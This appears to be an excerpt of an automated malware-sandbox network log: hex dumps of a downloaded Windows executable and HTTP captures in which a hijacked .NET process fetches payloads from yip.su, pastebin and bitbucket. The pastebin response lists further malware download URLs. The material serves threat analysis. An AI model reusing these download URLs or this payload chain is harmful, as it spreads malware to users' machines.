                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: ee 80 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 8b ec 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 85 08 fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 02 00 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 5b 04 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00
                                                                                                                                                                                                                                                            Data Ascii: [YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,54058
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 11 e8 c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            42192.168.2.555619172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC41OUTGET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:59 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NswEYml%2FTbMhCNMjipNcWb3Y%2F4AjkfNOpr2hF2%2Fh%2Bj7Fy3h2mtWNes%2FHP%2Fi7w1aKRSu1m9DEMUaU0d3BqOSU%2FP%2Batavx7yG%2BAe8VySixDDkmqJ%2BzanXJung%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202aaa4009ff-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC455INData Raw: 31 64 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                                                            Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f
                                                                                                                                                                                                                                                            Data Ascii: me="revisit-after" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https:/
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f
                                                                                                                                                                                                                                                            Data Ascii: idden{display:none}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animatio
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 0a 09 3c 2f 73 74 79 6c 65 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a
                                                                                                                                                                                                                                                            Data Ascii: </style><script>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 6b 69 6e 67 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63
                                                                                                                                                                                                                                                            Data Ascii: king browser before processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pac
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                                                                                                                                                                                                                                                            Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            43192.168.2.555620104.20.68.14344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC50OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 6
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202aaf8109f1-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC800INData Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            44192.168.2.555605104.192.141.144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC83OUTGET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC4235INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 997837.069
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1090.77
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: b9e31946e4f87466
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net 